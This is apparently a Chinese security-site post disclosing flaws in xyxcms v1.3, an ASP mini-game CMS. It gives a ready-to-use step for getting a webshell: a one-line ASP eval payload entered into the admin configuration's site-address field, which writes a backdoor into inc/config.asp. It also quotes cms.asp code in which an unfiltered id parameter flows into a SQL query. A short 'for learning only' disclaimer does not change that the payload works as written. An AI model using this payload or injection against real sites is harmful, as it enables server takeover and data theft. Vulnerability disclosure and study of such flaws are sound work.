xyxcms v1.3 小游戏CMS 漏洞说明

所属分类：网络安全 / 漏洞分析阅读数： 226

收藏 0赞 0分享

国内最专业的ASP网站内容管理系统-小游戏管理系统，他将是您轻松建站的首选利器。小游戏CMS系统对站点管理和创造编辑都有好处，无论是CMS系统的易用性和功能的完善性，都处于领先优势！网站的编辑、发布、管理人员可轻松便捷的通过小游戏CMS系统来提交修改、审批、发布内容。

　　[xyxcms]
　　版本信息：V1.3 正式版
　　软件大小：1.66M
　　更新时间：2010年8月6日
　　官方：http://www.xyxcms.com/
　　漏洞文件: cms.asp
　　程序虽小。总会遇到!
　　鄙视挂马者。!
　　学习之用。后果自负。
　　后台拿webshell:
　　admin/admin_config.asp
　　网站地址：插入 ":eval request("1"):'

复制代码

代码如下:

　　inc/config.asp 一句话后门
　　act=request("action")
　　id=trim(request("id"))
　　................'省略
　　if act="getding" then call getding
　　....................'省略
　　sub getding
　　id=request("id") '没过滤
　　set rs=server.createobject("adodb.recordset")
　　sql="select ding from flash where id="&id
　　rs.open sql,conn,1,1
　　if not rs.eof then
　　if isnull(rs(0)) then
　　response.Write(0)
　　else
　　response.Write(rs(0))
　　end if
　　else
　　response.Write(0)
　　end if
　　rs.close
　　set rs=nothing
　　end sub

更多精彩内容其他人还在看

xyxcms v1.3 小游戏CMS 漏洞说明

织梦管理系统后台查找

ckeditor/DesignCms上传漏洞

DedeCmsV5.6 本地包含又一利用方式

phpcms V9 BLind SQL 注入漏洞0day

AWBS 2.9.2 Blind SQL 注入0day

金山毒霸多个sql注入及XSS漏洞和修复

Zblog最新跨站漏洞及利用代码

xyxcms v1.3 小游戏CMS 漏洞说明

Discuz X1.5 用不到 Gmail SSL SMTP

万能密码漏洞以及修复

网络赚钱

站长故事